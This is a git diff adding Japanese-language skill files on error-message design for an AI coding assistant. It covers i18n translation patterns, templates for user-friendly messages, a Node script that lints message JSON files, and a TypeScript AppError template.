+translateError('validation.required', { field: 'メールアドレス' });
+// 日本語: "メールアドレスは必須です"
+// 英語: "Email address is required"
+```
+
+### フィールド名の翻訳
+
+```typescript
+// フィールド名も翻訳する
+const fieldLabels = {
+  ja: {
+    email: 'メールアドレス',
+    password: 'パスワード',
+    username: 'ユーザー名',
+    phone: '電話番号',
+  },
+  en: {
+    email: 'Email',
+    password: 'Password',
+    username: 'Username',
+    phone: 'Phone number',
+  },
+};
+
+function getFieldLabel(field: string, locale: string): string {
+  return fieldLabels[locale]?.[field] || field;
+}
+
+function translateValidationError(
+  key: string,
+  field: string,
+  locale: string,
+  params?: Record<string, unknown>
+): string {
+  const fieldLabel = getFieldLabel(field, locale);
+  return i18next.t(`errors:validation.${key}`, {
+    lng: locale,
+    field: fieldLabel,
+    ...params,
+  });
+}
+```
+
+## 複数形の処理
+
+### ICU MessageFormat
+
+```typescript
+import { createIntl, createIntlCache } from '@formatjs/intl';
+
+const cache = createIntlCache();
+
+const messages = {
+  ja: {
+    filesSelected: '{count}個のファイルが選択されています',
+    itemsRemaining: '残り{count}件',
+  },
+  en: {
+    filesSelected: '{count, plural, one {# file} other {# files}} selected',
+    itemsRemaining: '{count, plural, one {# item} other {# items}} remaining',
+  },
+};
+
+function createFormatter(locale: string) {
+  return createIntl({
+    locale,
+    messages: messages[locale],
+  }, cache);
+}
+
+// 使用例
+const intl = createFormatter('en');
+intl.formatMessage({ id: 'filesSelected' }, { count: 1 });
+// "1 file selected"
+intl.formatMessage({ id: 'filesSelected' }, { count: 5 });
+// "5 files selected"
+```
+
+### 日本語での数量表現
+
+```typescript
+// 日本語は複数形が少ないが、助数詞に注意
+const jaCounters = {
+  file: '個',
+  person: '人',
+  item: '件',
+  page: 'ページ',
+  minute: '分',
+};
+
+function formatCount(count: number, type: keyof typeof jaCounters): string {
+  const counter = jaCounters[type];
+  return `${count}${counter}`;
+}
+```
+
+## 文化的配慮
+
+### 日付・時刻のフォーマット
+
+```typescript
+import { format, formatDistanceToNow } from 'date-fns';
+import { ja, enUS, zhCN } from 'date-fns/locale';
+
+const locales = { ja, en: enUS, zh: zhCN };
+
+function formatDate(date: Date, locale: string, formatStr: string): string {
+  return format(date, formatStr, { locale: locales[locale] });
+}
+
+// エラーメッセージでの使用
+const errorMessages = {
+  ja: {
+    sessionExpired: 'セッションの有効期限が切れました（{time}に期限切れ）',
+    maintenanceUntil: '{endTime}までメンテナンス中です',
+  },
+  en: {
+    sessionExpired: 'Your session has expired (expired {time})',
+    maintenanceUntil: 'Under maintenance until {endTime}',
+  },
+};
+
+function formatSessionExpiredError(expiredAt: Date, locale: string): string {
+  const time = formatDistanceToNow(expiredAt, {
+    locale: locales[locale],
+    addSuffix: true
+  });
+  // 日本語: "5分前"
+  // 英語: "5 minutes ago"
+  return errorMessages[locale].sessionExpired.replace('{time}', time);
+}
+```
+
+### 敬語レベル（日本語）
+
+```typescript
+// 日本語の敬語レベル
+type PolitenessLevel = 'casual' | 'polite' | 'honorific';
+
+const jaMessages: Record<PolitenessLevel, Record<string, string>> = {
+  casual: {
+    loginRequired: 'ログインしてね',
+    error: 'エラーだよ',
+  },
+  polite: {
+    loginRequired: 'ログインしてください',
+    error: 'エラーが発生しました',
+  },
+  honorific: {
+    loginRequired: 'ログインをお願いいたします',
+    error: 'エラーが発生いたしました',
+  },
+};
+
+// ビジネス向けはhonorific、一般向けはpolite
+function getJapaneseMessage(key: string, level: PolitenessLevel = 'polite'): string {
+  return jaMessages[level][key] || jaMessages['polite'][key];
+}
+```
+
+## エラーコンポーネント
+
+### React i18n対応エラー表示
+
+```tsx
+import { useTranslation } from 'react-i18next';
+
+interface ErrorMessageProps {
+  errorKey: string;
+  params?: Record<string, unknown>;
+  className?: string;
+}
+
+function ErrorMessage({ errorKey, params, className }: ErrorMessageProps) {
+  const { t } = useTranslation('errors');
+
+  return (
+    <div className={className} role="alert">
+      {t(errorKey, params)}
+    </div>
+  );
+}
+
+// フィールドエラー用
+interface FieldErrorProps {
+  field: string;
+  errorKey: string;
+  params?: Record<string, unknown>;
+}
+
+function FieldError({ field, errorKey, params }: FieldErrorProps) {
+  const { t } = useTranslation(['errors', 'fields']);
+
+  const fieldLabel = t(`fields:${field}`);
+
+  return (
+    <span className="field-error" role="alert" aria-live="polite">
+      {t(`errors:validation.${errorKey}`, { field: fieldLabel, ...params })}
+    </span>
+  );
+}
+```
+
+### 言語切り替え時の即時反映
+
+```tsx
+import { useEffect } from 'react';
+import { useTranslation } from 'react-i18next';
+
+function useErrorMessages() {
+  const { t, i18n } = useTranslation('errors');
+
+  // 言語変更時にエラーメッセージを再評価
+  useEffect(() => {
+    // コンポーネントの再レンダリングをトリガー
+  }, [i18n.language]);
+
+  return {
+    translate: (key: string, params?: Record<string, unknown>) => t(key, params),
+    currentLanguage: i18n.language,
+  };
+}
+```
+
+## バックエンドでのi18n
+
+### Express.js with i18next
+
+```typescript
+import express from 'express';
+import i18next from 'i18next';
+import i18nextMiddleware from 'i18next-http-middleware';
+
+await i18next.init({
+  preload: ['ja', 'en'],
+  fallbackLng: 'en',
+  resources: {
+    // リソース設定
+  },
+});
+
+const app = express();
+app.use(i18nextMiddleware.handle(i18next));
+
+// エラーハンドラー
+app.use((err: AppError, req: express.Request, res: express.Response, next: express.NextFunction) => {
+  const t = req.t; // i18nextミドルウェアが追加
+
+  res.status(err.httpStatus).json({
+    code: err.code,
+    message: t(`errors:${err.code}`),
+    action: err.action ? t(`errors:actions.${err.code}`) : undefined,
+  });
+});
+```
+
+### Accept-Languageヘッダーの処理
+
+```typescript
+function detectLanguage(acceptLanguage: string | undefined): string {
+  if (!acceptLanguage) return 'en';
+
+  const languages = acceptLanguage
+    .split(',')
+    .map((lang) => {
+      const [code, priority] = lang.trim().split(';q=');
+      return {
+        code: code.split('-')[0], // ja-JP → ja
+        priority: priority ? parseFloat(priority) : 1.0,
+      };
+    })
+    .sort((a, b) => b.priority - a.priority);
+
+  const supportedLanguages = ['ja', 'en', 'zh', 'ko'];
+  const detected = languages.find((l) => supportedLanguages.includes(l.code));
+
+  return detected?.code || 'en';
+}
+```
+
+## テスト
+
+```typescript
+import { describe, it, expect } from 'vitest';
+
+describe('i18n error messages', () => {
+  it('should translate validation errors in Japanese', () => {
+    const message = translateError('validation.required', { field: 'メールアドレス' }, 'ja');
+    expect(message).toBe('メールアドレスは必須です');
+  });
+
+  it('should translate validation errors in English', () => {
+    const message = translateError('validation.required', { field: 'Email' }, 'en');
+    expect(message).toBe('Email is required');
+  });
+
+  it('should fall back to English for unsupported languages', () => {
+    const message = translateError('validation.required', { field: 'Email' }, 'fr');
+    expect(message).toBe('Email is required');
+  });
+});
+```
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/error-message-design/resources/user-friendly-messages.md
+++ b/.claude/skills/error-message-design/resources/user-friendly-messages.md
@@ -1,0 +1,355 @@
+# ユーザーフレンドリーメッセージ
+
+## 概要
+
+ユーザーが理解しやすく、行動を起こせるエラーメッセージの設計パターンを解説します。
+
+## 良いエラーメッセージの原則
+
+### 1. 具体的であること
+
+```typescript
+// ❌ 抽象的
+"入力が無効です"
+"エラーが発生しました"
+"処理できません"
+
+// ✅ 具体的
+"メールアドレスの形式が正しくありません（例: user@example.com）"
+"ファイルサイズが5MBを超えています（現在: 8.5MB）"
+"パスワードは8文字以上で、英数字と記号を含める必要があります"
+```
+
+### 2. アクション指向であること
+
+```typescript
+// ❌ 問題の指摘のみ
+"パスワードが短すぎます"
+
+// ✅ 解決方法を提示
+"パスワードは8文字以上必要です。あと3文字追加してください"
+
+// ❌ 何をすればいいか不明
+"認証に失敗しました"
+
+// ✅ 次のステップを提示
+"パスワードが間違っています。パスワードをお忘れの場合は、下のリンクから再設定できます"
+```
+
+### 3. 人間らしい言葉を使うこと
+
+```typescript
+// ❌ 技術用語
+"Invalid UTF-8 sequence in input"
+"HTTP 403 Forbidden"
+"Null pointer exception"
+
+// ✅ 平易な言葉
+"入力に使用できない文字が含まれています"
+"この操作を行う権限がありません"
+"システムエラーが発生しました。しばらくお待ちください"
+```
+
+## メッセージテンプレート
+
+### バリデーションエラー
+
+```typescript
+const VALIDATION_MESSAGES = {
+  required: {
+    template: '{field}を入力してください',
+    examples: {
+      email: 'メールアドレスを入力してください',
+      name: 'お名前を入力してください',
+    },
+  },
+
+  email: {
+    template: '有効なメールアドレスを入力してください',
+    hint: '例: taro@example.com',
+  },
+
+  minLength: {
+    template: '{field}は{min}文字以上で入力してください',
+    current: '現在: {current}文字',
+    action: 'あと{remaining}文字必要です',
+  },
+
+  maxLength: {
+    template: '{field}は{max}文字以内で入力してください',
+    current: '現在: {current}文字',
+    action: '{excess}文字オーバーしています',
+  },
+
+  pattern: {
+    template: '{field}の形式が正しくありません',
+    formats: {
+      phone: '電話番号は数字とハイフンのみ使用できます（例: 03-1234-5678）',
+      postalCode: '郵便番号は7桁の数字で入力してください（例: 123-4567）',
+    },
+  },
+
+  range: {
+    template: '{field}は{min}から{max}の間で入力してください',
+    current: '入力値: {current}',
+  },
+
+  unique: {
+    template: 'この{field}は既に使用されています',
+    action: '別の{field}を入力してください',
+  },
+
+  match: {
+    template: '{field}が一致しません',
+    examples: {
+      password: 'パスワードと確認用パスワードが一致しません',
+    },
+  },
+};
+```
+
+### システムエラー
+
+```typescript
+const SYSTEM_MESSAGES = {
+  network: {
+    offline: {
+      title: 'インターネットに接続できません',
+      action: 'ネットワーク接続を確認してから、もう一度お試しください',
+    },
+    timeout: {
+      title: '接続がタイムアウトしました',
+      action: 'しばらく待ってからもう一度お試しください',
+    },
+    serverError: {
+      title: 'サーバーに接続できません',
+      action: '時間をおいて再度お試しください。問題が続く場合はお問い合わせください',
+    },
+  },
+
+  permission: {
+    denied: {
+      title: 'アクセス権限がありません',
+      action: '必要な権限については管理者にお問い合わせください',
+    },
+    expired: {
+      title: 'セッションの有効期限が切れました',
+      action: '再度ログインしてください',
+    },
+  },
+
+  resource: {
+    notFound: {
+      title: 'ページが見つかりません',
+      action: 'URLを確認するか、トップページからお探しください',
+    },
+    conflict: {
+      title: '変更が競合しました',
+      action: '画面を更新して、もう一度お試しください',
+    },
+  },
+
+  maintenance: {
+    scheduled: {
+      title: 'メンテナンス中です',
+      action: '{endTime}に再開予定です。しばらくお待ちください',
+    },
+    unscheduled: {
+      title: '現在サービスを一時停止しています',
+      action: '復旧までしばらくお待ちください',
+    },
+  },
+};
+```
+
+### ファイルアップロードエラー
+
+```typescript
+const FILE_UPLOAD_MESSAGES = {
+  tooLarge: {
+    template: 'ファイルサイズが大きすぎます',
+    detail: '最大{maxSize}までアップロードできます（現在: {currentSize}）',
+    action: 'ファイルを圧縮するか、別のファイルを選択してください',
+  },
+
+  invalidType: {
+    template: 'このファイル形式はサポートされていません',
+    detail: '対応形式: {allowedTypes}',
+    action: '別の形式に変換してからアップロードしてください',
+  },
+
+  tooMany: {
+    template: 'ファイル数が多すぎます',
+    detail: '一度にアップロードできるのは{maxFiles}ファイルまでです',
+    action: 'ファイルを減らしてもう一度お試しください',
+  },
+
+  uploadFailed: {
+    template: 'アップロードに失敗しました',
+    action: 'もう一度お試しください。問題が続く場合はファイルサイズや形式を確認してください',
+  },
+};
+```
+
+## コンテキスト別メッセージ
+
+### フォームコンテキスト
+
+```typescript
+interface FormErrorContext {
+  fieldName: string;
+  fieldLabel: string;
+  currentValue: unknown;
+  constraints: Record<string, unknown>;
+}
+
+function formatFormError(code: string, context: FormErrorContext): string {
+  const { fieldLabel, currentValue, constraints } = context;
+
+  switch (code) {
+    case 'required':
+      return `${fieldLabel}は必須です`;
+
+    case 'minLength':
+      const currentLength = String(currentValue).length;
+      const minLength = constraints.min as number;
+      const remaining = minLength - currentLength;
+      return `${fieldLabel}は${minLength}文字以上必要です（あと${remaining}文字）`;
+
+    case 'email':
+      return `有効なメールアドレスを入力してください`;
+
+    default:
+      return `${fieldLabel}の入力内容を確認してください`;
+  }
+}
+```
+
+### APIコンテキスト
+
+```typescript
+interface ApiErrorContext {
+  endpoint: string;
+  method: string;
+  statusCode: number;
+  errorCode?: string;
+}
+
+function formatApiError(context: ApiErrorContext): string {
+  const { statusCode, errorCode } = context;
+
+  // 一般的なHTTPエラー
+  const httpMessages: Record<number, string> = {
+    400: 'リクエストに問題があります。入力内容を確認してください',
+    401: 'ログインが必要です',
+    403: 'この操作を行う権限がありません',
+    404: 'お探しのデータが見つかりませんでした',
+    409: 'データの競合が発生しました。画面を更新してください',
+    429: 'リクエストが多すぎます。しばらくお待ちください',
+    500: 'サーバーエラーが発生しました。しばらくお待ちください',
+    502: 'サーバーに接続できません。しばらくお待ちください',
+    503: 'サービスは一時的に利用できません',
+  };
+
+  return httpMessages[statusCode] || '予期しないエラーが発生しました';
+}
+```
+
+## トースト・通知メッセージ
+
+```typescript
+interface ToastMessage {
+  type: 'success' | 'error' | 'warning' | 'info';
+  title: string;
+  description?: string;
+  action?: {
+    label: string;
+    onClick: () => void;
+  };
+  duration?: number;
+}
+
+const TOAST_MESSAGES = {
+  // 成功メッセージ
+  saved: {
+    type: 'success' as const,
+    title: '保存しました',
+    duration: 3000,
+  },
+  deleted: {
+    type: 'success' as const,
+    title: '削除しました',
+    duration: 3000,
+  },
+  sent: {
+    type: 'success' as const,
+    title: '送信しました',
+    duration: 3000,
+  },
+
+  // エラーメッセージ
+  saveFailed: {
+    type: 'error' as const,
+    title: '保存できませんでした',
+    description: 'もう一度お試しください',
+    action: { label: '再試行', onClick: () => {} },
+    duration: 5000,
+  },
+  networkError: {
+    type: 'error' as const,
+    title: '接続エラー',
+    description: 'ネットワーク接続を確認してください',
+    duration: 5000,
+  },
+
+  // 警告メッセージ
+  unsavedChanges: {
+    type: 'warning' as const,
+    title: '未保存の変更があります',
+    description: 'このページを離れると変更が失われます',
+    action: { label: '保存する', onClick: () => {} },
+    duration: 0, // 自動で消えない
+  },
+};
+```
+
+## ベストプラクティス
+
+### 1. ポジティブなフレーミング
+
+```typescript
+// ❌ ネガティブ
+"パスワードが間違っています"
+"アクセスが拒否されました"
+
+// ✅ ポジティブ
+"パスワードを確認してください"
+"このページにアクセスするにはログインが必要です"
+```
+
+### 2. 責任の所在を適切に
+
+```typescript
+// ❌ ユーザーを責める
+"あなたの入力が間違っています"
+
+// ✅ 問題を客観的に述べる
+"入力形式を確認してください"
+
+// ✅ システム側の問題を認める
+"システムの問題により処理できませんでした。ご不便をおかけして申し訳ありません"
+```
+
+### 3. 進捗状況を示す
+
+```typescript
+// 長時間処理の場合
+"ファイルをアップロード中です... (3/5ファイル完了)"
+"データを処理しています。完了まで約2分お待ちください"
+```
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/error-message-design/scripts/validate-error-messages.mjs
+++ b/.claude/skills/error-message-design/scripts/validate-error-messages.mjs
@@ -1,0 +1,346 @@
+#!/usr/bin/env node
+/**
+ * エラーメッセージ検証スクリプト
+ * エラーメッセージファイル（JSON）の品質をチェックします
+ *
+ * 使用方法:
+ *   node validate-error-messages.mjs <messages.json> [--fix] [--locale=ja]
+ *
+ * オプション:
+ *   --fix           修正提案を適用
+ *   --locale=<lang> 検証対象の言語（デフォルト: ja）
+ */
+
+import { readFileSync, writeFileSync } from 'fs';
+import { resolve } from 'path';
+
+// 検証ルール
+const VALIDATION_RULES = {
+  // 技術用語のチェック
+  technicalTerms: {
+    patterns: [
+      /null/i,
+      /undefined/i,
+      /exception/i,
+      /error code/i,
+      /HTTP \d{3}/i,
+      /server error/i,
+      /database/i,
+      /query/i,
+      /token/i,
+      /parameter/i,
+      /invalid/i,
+      /malformed/i,
+    ],
+    message: '技術用語が含まれています。ユーザーフレンドリーな表現に変更してください',
+    severity: 'warning',
+  },
+
+  // 長さチェック
+  length: {
+    maxTitle: 50,
+    maxDetail: 200,
+    message: 'メッセージが長すぎます',
+    severity: 'warning',
+  },
+
+  // アクション指向チェック
+  actionOriented: {
+    actionWords: {
+      ja: ['してください', 'ください', 'お試し', '確認', '入力'],
+      en: ['please', 'try', 'check', 'enter', 'contact'],
+    },
+    message: 'ユーザーへのアクション指示がありません',
+    severity: 'info',
+  },
+
+  // プレースホルダーチェック
+  placeholders: {
+    pattern: /\{[^}]+\}/g,
+    message: 'プレースホルダーのフォーマットを確認してください',
+    severity: 'info',
+  },
+
+  // 敬語チェック（日本語）
+  politeness: {
+    casualPatterns: [/だよ/, /してね/, /ごめん/],
+    message: 'カジュアルな表現が含まれています。敬語に統一してください',
+    severity: 'warning',
+    locales: ['ja'],
+  },
+
+  // 句読点チェック
+  punctuation: {
+    patterns: {
+      ja: /[。、]$/,
+      en: /[.!?]$/,
+    },
+    message: '文末に句読点がありません',
+    severity: 'info',
+  },
+
+  // 空文字チェック
+  empty: {
+    message: '空のメッセージがあります',
+    severity: 'error',
+  },
+};
+
+// 検証結果
+const issues = [];
+
+// メッセージを検証
+function validateMessage(key, value, locale, path = []) {
+  const currentPath = [...path, key].join('.');
+
+  if (typeof value === 'object' && value !== null) {
+    // ネストされたオブジェクトを再帰的に処理
+    for (const [k, v] of Object.entries(value)) {
+      validateMessage(k, v, locale, [...path, key]);
+    }
+    return;
+  }
+
+  if (typeof value !== 'string') {
+    return;
+  }
+
+  // 空文字チェック
+  if (value.trim() === '') {
+    issues.push({
+      path: currentPath,
+      value,
+      rule: 'empty',
+      message: VALIDATION_RULES.empty.message,
+      severity: VALIDATION_RULES.empty.severity,
+    });
+    return;
+  }
+
+  // 技術用語チェック
+  for (const pattern of VALIDATION_RULES.technicalTerms.patterns) {
+    if (pattern.test(value)) {
+      issues.push({
+        path: currentPath,
+        value,
+        rule: 'technicalTerms',
+        message: `${VALIDATION_RULES.technicalTerms.message}: "${value.match(pattern)?.[0]}"`,
+        severity: VALIDATION_RULES.technicalTerms.severity,
+      });
+      break;
+    }
+  }
+
+  // 長さチェック
+  const { maxTitle, maxDetail } = VALIDATION_RULES.length;
+  const maxLen = key.includes('title') ? maxTitle : maxDetail;
+  if (value.length > maxLen) {
+    issues.push({
+      path: currentPath,
+      value,
+      rule: 'length',
+      message: `${VALIDATION_RULES.length.message} (${value.length}/${maxLen}文字)`,
+      severity: VALIDATION_RULES.length.severity,
+    });
+  }
+
+  // アクション指向チェック（actionやdetailフィールドのみ）
+  if (key.includes('action') || key.includes('detail')) {
+    const actionWords = VALIDATION_RULES.actionOriented.actionWords[locale] || [];
+    const hasAction = actionWords.some((word) =>
+      value.toLowerCase().includes(word.toLowerCase())
+    );
+    if (!hasAction) {
+      issues.push({
+        path: currentPath,
+        value,
+        rule: 'actionOriented',
+        message: VALIDATION_RULES.actionOriented.message,
+        severity: VALIDATION_RULES.actionOriented.severity,
+      });
+    }
+  }
+
+  // 敬語チェック（日本語）
+  if (locale === 'ja' && VALIDATION_RULES.politeness.locales.includes(locale)) {
+    for (const pattern of VALIDATION_RULES.politeness.casualPatterns) {
+      if (pattern.test(value)) {
+        issues.push({
+          path: currentPath,
+          value,
+          rule: 'politeness',
+          message: VALIDATION_RULES.politeness.message,
+          severity: VALIDATION_RULES.politeness.severity,
+        });
+        break;
+      }
+    }
+  }
+
+  // プレースホルダーの整合性チェック
+  const placeholders = value.match(VALIDATION_RULES.placeholders.pattern) || [];
+  for (const placeholder of placeholders) {
+    const name = placeholder.slice(1, -1);
+    if (!/^[a-zA-Z_][a-zA-Z0-9_]*$/.test(name)) {
+      issues.push({
+        path: currentPath,
+        value,
+        rule: 'placeholders',
+        message: `不正なプレースホルダー名: ${placeholder}`,
+        severity: 'warning',
+      });
+    }
+  }
+}
+
+// 結果をフォーマット
+function formatResults() {
+  if (issues.length === 0) {
+    return '✅ すべてのメッセージが検証に合格しました';
+  }
+
+  const grouped = {
+    error: issues.filter((i) => i.severity === 'error'),
+    warning: issues.filter((i) => i.severity === 'warning'),
+    info: issues.filter((i) => i.severity === 'info'),
+  };
+
+  const severityLabels = {
+    error: '❌ エラー',
+    warning: '⚠️  警告',
+    info: '💡 情報',
+  };
+
+  let output = '\n📋 エラーメッセージ検証結果\n';
+  output += '═'.repeat(60) + '\n';
+
+  for (const [severity, items] of Object.entries(grouped)) {
+    if (items.length === 0) continue;
+
+    output += `\n${severityLabels[severity]} (${items.length}件)\n`;
+    output += '─'.repeat(60) + '\n';
+
+    for (const item of items) {
+      output += `\n📍 ${item.path}\n`;
+      output += `   "${item.value.substring(0, 50)}${item.value.length > 50 ? '...' : ''}"\n`;
+      output += `   → ${item.message}\n`;
+    }
+  }
+
+  output += '\n' + '═'.repeat(60) + '\n';
+  output += `📊 合計: ${issues.length}件\n`;
+  output += `   エラー: ${grouped.error.length}\n`;
+  output += `   警告: ${grouped.warning.length}\n`;
+  output += `   情報: ${grouped.info.length}\n`;
+
+  return output;
+}
+
+// カバレッジレポート
+function generateCoverageReport(messages, locale) {
+  const stats = {
+    total: 0,
+    withAction: 0,
+    withPlaceholder: 0,
+    averageLength: 0,
+  };
+
+  function countMessages(obj) {
+    for (const [key, value] of Object.entries(obj)) {
+      if (typeof value === 'object' && value !== null) {
+        countMessages(value);
+      } else if (typeof value === 'string') {
+        stats.total++;
+        stats.averageLength += value.length;
+
+        const actionWords = VALIDATION_RULES.actionOriented.actionWords[locale] || [];
+        if (actionWords.some((w) => value.toLowerCase().includes(w.toLowerCase()))) {
+          stats.withAction++;
+        }
+
+        if (VALIDATION_RULES.placeholders.pattern.test(value)) {
+          stats.withPlaceholder++;
+        }
+      }
+    }
+  }
+
+  countMessages(messages);
+
+  if (stats.total > 0) {
+    stats.averageLength = Math.round(stats.averageLength / stats.total);
+  }
+
+  let report = '\n📈 カバレッジレポート\n';
+  report += '─'.repeat(40) + '\n';
+  report += `総メッセージ数: ${stats.total}\n`;
+  report += `アクション指示付き: ${stats.withAction} (${Math.round((stats.withAction / stats.total) * 100)}%)\n`;
+  report += `プレースホルダー付き: ${stats.withPlaceholder} (${Math.round((stats.withPlaceholder / stats.total) * 100)}%)\n`;
+  report += `平均文字数: ${stats.averageLength}\n`;
+
+  return report;
+}
+
+// メイン処理
+function main() {
+  const args = process.argv.slice(2);
+
+  if (args.length === 0 || args.includes('--help')) {
+    console.log(`
+エラーメッセージ検証スクリプト
+
+使用方法:
+  node validate-error-messages.mjs <messages.json> [options]
+
+オプション:
+  --locale=<lang>  検証対象の言語（デフォルト: ja）
+  --coverage       カバレッジレポートを表示
+  --json           JSON形式で出力
+  --help           ヘルプを表示
+
+例:
+  node validate-error-messages.mjs locales/ja/errors.json
+  node validate-error-messages.mjs locales/en/errors.json --locale=en
+  node validate-error-messages.mjs locales/ja/errors.json --coverage
+
+検証内容:
+  - 技術用語の使用
+  - メッセージの長さ
+  - アクション指向の表現
+  - プレースホルダーのフォーマット
+  - 敬語の一貫性（日本語）
+  - 空メッセージ
+`);
+    process.exit(0);
+  }
+
+  const filePath = resolve(args.find((a) => !a.startsWith('--')));
+  const localeArg = args.find((a) => a.startsWith('--locale='));
+  const locale = localeArg ? localeArg.split('=')[1] : 'ja';
+  const showCoverage = args.includes('--coverage');
+  const jsonOutput = args.includes('--json');
+
+  try {
+    const content = readFileSync(filePath, 'utf-8');
+    const messages = JSON.parse(content);
+
+    validateMessage('root', messages, locale);
+
+    if (jsonOutput) {
+      console.log(JSON.stringify({ issues, locale, file: filePath }, null, 2));
+    } else {
+      console.log(formatResults());
+      if (showCoverage) {
+        console.log(generateCoverageReport(messages, locale));
+      }
+    }
+
+    const hasErrors = issues.some((i) => i.severity === 'error');
+    process.exit(hasErrors ? 1 : 0);
+  } catch (error) {
+    console.error(`❌ エラー: ${error.message}`);
+    process.exit(1);
+  }
+}
+
+main();

--- a/.claude/skills/error-message-design/templates/error-system-template.ts
+++ b/.claude/skills/error-message-design/templates/error-system-template.ts
@@ -1,0 +1,385 @@
+/**
+ * エラーシステムテンプレート
+ *
+ * 型安全で国際化対応のエラーハンドリングシステムです。
+ * このテンプレートをプロジェクトに合わせてカスタマイズしてください。
+ *
+ * @example
+ * // このファイルをコピーして、プロジェクトのエラーシステムに使用
+ * cp templates/error-system-template.ts src/errors/index.ts
+ */
+
+// ============================================================
+// 1. エラーコード定義
+// ============================================================
+
+/** エラーカテゴリ */
+type ErrorCategory = 'AUTH' | 'VAL' | 'RES' | 'SYS' | 'NET' | 'BIZ' | 'FILE' | 'RATE';
+
+/** HTTPステータスコード */
+type HttpStatus = 400 | 401 | 403 | 404 | 409 | 422 | 429 | 500 | 502 | 503;
+
+/** エラー定義 */
+interface ErrorDefinition {
+  code: string;
+  category: ErrorCategory;
+  httpStatus: HttpStatus;
+  message: string;
+  userMessage: {
+    ja: string;
+    en: string;
+  };
+  action?: {
+    ja: string;
+    en: string;
+  };
+}
+
+/** エラーコードマップ */
+const ERROR_CODES = {
+  // 認証系
+  AUTH_REQUIRED: {
+    code: 'AUTH_001',
+    category: 'AUTH' as const,
+    httpStatus: 401 as const,
+    message: 'Authentication required',
+    userMessage: {
+      ja: 'ログインが必要です',
+      en: 'Please log in to continue',
+    },
+    action: {
+      ja: 'ログインしてから再度お試しください',
+      en: 'Please log in and try again',
+    },
+  },
+  AUTH_SESSION_EXPIRED: {
+    code: 'AUTH_002',
+    category: 'AUTH' as const,
+    httpStatus: 401 as const,
+    message: 'Session expired',
+    userMessage: {
+      ja: 'セッションの有効期限が切れました',
+      en: 'Your session has expired',
+    },
+    action: {
+      ja: '再度ログインしてください',
+      en: 'Please log in again',
+    },
+  },
+  AUTH_FORBIDDEN: {
+    code: 'AUTH_003',
+    category: 'AUTH' as const,
+    httpStatus: 403 as const,
+    message: 'Access forbidden',
+    userMessage: {
+      ja: 'この操作を行う権限がありません',
+      en: 'You do not have permission for this action',
+    },
+    action: {
+      ja: '管理者にお問い合わせください',
+      en: 'Please contact your administrator',
+    },
+  },
+
+  // バリデーション系
+  VAL_REQUIRED: {
+    code: 'VAL_001',
+    category: 'VAL' as const,
+    httpStatus: 400 as const,
+    message: 'Required field missing',
+    userMessage: {
+      ja: '必須項目が入力されていません',
+      en: 'Required field is missing',
+    },
+  },
+  VAL_FORMAT: {
+    code: 'VAL_002',
+    category: 'VAL' as const,
+    httpStatus: 400 as const,
+    message: 'Invalid format',
+    userMessage: {
+      ja: '入力形式が正しくありません',
+      en: 'Invalid format',
+    },
+  },
+
+  // リソース系
+  RES_NOT_FOUND: {
+    code: 'RES_001',
+    category: 'RES' as const,
+    httpStatus: 404 as const,
+    message: 'Resource not found',
+    userMessage: {
+      ja: 'お探しのデータが見つかりません',
+      en: 'The requested data was not found',
+    },
+    action: {
+      ja: 'URLを確認するか、一覧から選択してください',
+      en: 'Please check the URL or select from the list',
+    },
+  },
+  RES_CONFLICT: {
+    code: 'RES_002',
+    category: 'RES' as const,
+    httpStatus: 409 as const,
+    message: 'Resource conflict',
+    userMessage: {
+      ja: 'データの競合が発生しました',
+      en: 'A data conflict has occurred',
+    },
+    action: {
+      ja: '画面を更新してからやり直してください',
+      en: 'Please refresh the page and try again',
+    },
+  },
+
+  // システム系
+  SYS_INTERNAL: {
+    code: 'SYS_001',
+    category: 'SYS' as const,
+    httpStatus: 500 as const,
+    message: 'Internal server error',
+    userMessage: {
+      ja: 'システムエラーが発生しました',
+      en: 'A system error has occurred',
+    },
+    action: {
+      ja: 'しばらく待ってからもう一度お試しください',
+      en: 'Please wait a moment and try again',
+    },
+  },
+
+  // レート制限
+  RATE_LIMITED: {
+    code: 'RATE_001',
+    category: 'RATE' as const,
+    httpStatus: 429 as const,
+    message: 'Rate limit exceeded',
+    userMessage: {
+      ja: 'リクエストが多すぎます',
+      en: 'Too many requests',
+    },
+    action: {
+      ja: 'しばらく待ってからお試しください',
+      en: 'Please wait a moment and try again',
+    },
+  },
+} as const;
+
+type ErrorCodeKey = keyof typeof ERROR_CODES;
+
+// ============================================================
+// 2. エラークラス
+// ============================================================
+
+/** サポートする言語 */
+type Locale = 'ja' | 'en';
+
+/** フィールドエラー */
+interface FieldError {
+  field: string;
+  message: string;
+  code: string;
+}
+
+/** エラーオプション */
+interface AppErrorOptions {
+  details?: Record<string, unknown>;
+  cause?: Error;
+  locale?: Locale;
+}
+
+/** アプリケーションエラークラス */
+class AppError extends Error {
+  readonly code: string;
+  readonly category: ErrorCategory;
+  readonly httpStatus: HttpStatus;
+  readonly userMessage: string;
+  readonly action?: string;
+  readonly details?: Record<string, unknown>;
+  readonly locale: Locale;
+
+  constructor(errorKey: ErrorCodeKey, options: AppErrorOptions = {}) {
+    const def = ERROR_CODES[errorKey];
+    const locale = options.locale || 'ja';
+
+    super(def.message);
+
+    this.name = 'AppError';
+    this.code = def.code;
+    this.category = def.category;
+    this.httpStatus = def.httpStatus;
+    this.userMessage = def.userMessage[locale];
+    this.action = def.action?.[locale];
+    this.details = options.details;
+    this.locale = locale;
+    this.cause = options.cause;
+
+    Error.captureStackTrace(this, this.constructor);
+  }
+
+  /** RFC 7807 Problem Details形式に変換 */
+  toProblemDetails(baseUrl: string, instance?: string): ProblemDetails {
+    return {
+      type: `${baseUrl}/errors/${this.code.toLowerCase()}`,
+      title: this.userMessage,
+      status: this.httpStatus,
+      detail: this.action,
+      instance,
+      code: this.code,
+      timestamp: new Date().toISOString(),
+    };
+  }
+
+  /** JSON形式に変換 */
+  toJSON(): Record<string, unknown> {
+    return {
+      code: this.code,
+      message: this.userMessage,
+      action: this.action,
+      details: this.details,
+    };
+  }
+}
+
+/** RFC 7807 Problem Details */
+interface ProblemDetails {
+  type: string;
+  title: string;
+  status: number;
+  detail?: string;
+  instance?: string;
+  code?: string;
+  timestamp?: string;
+  errors?: FieldError[];
+}
+
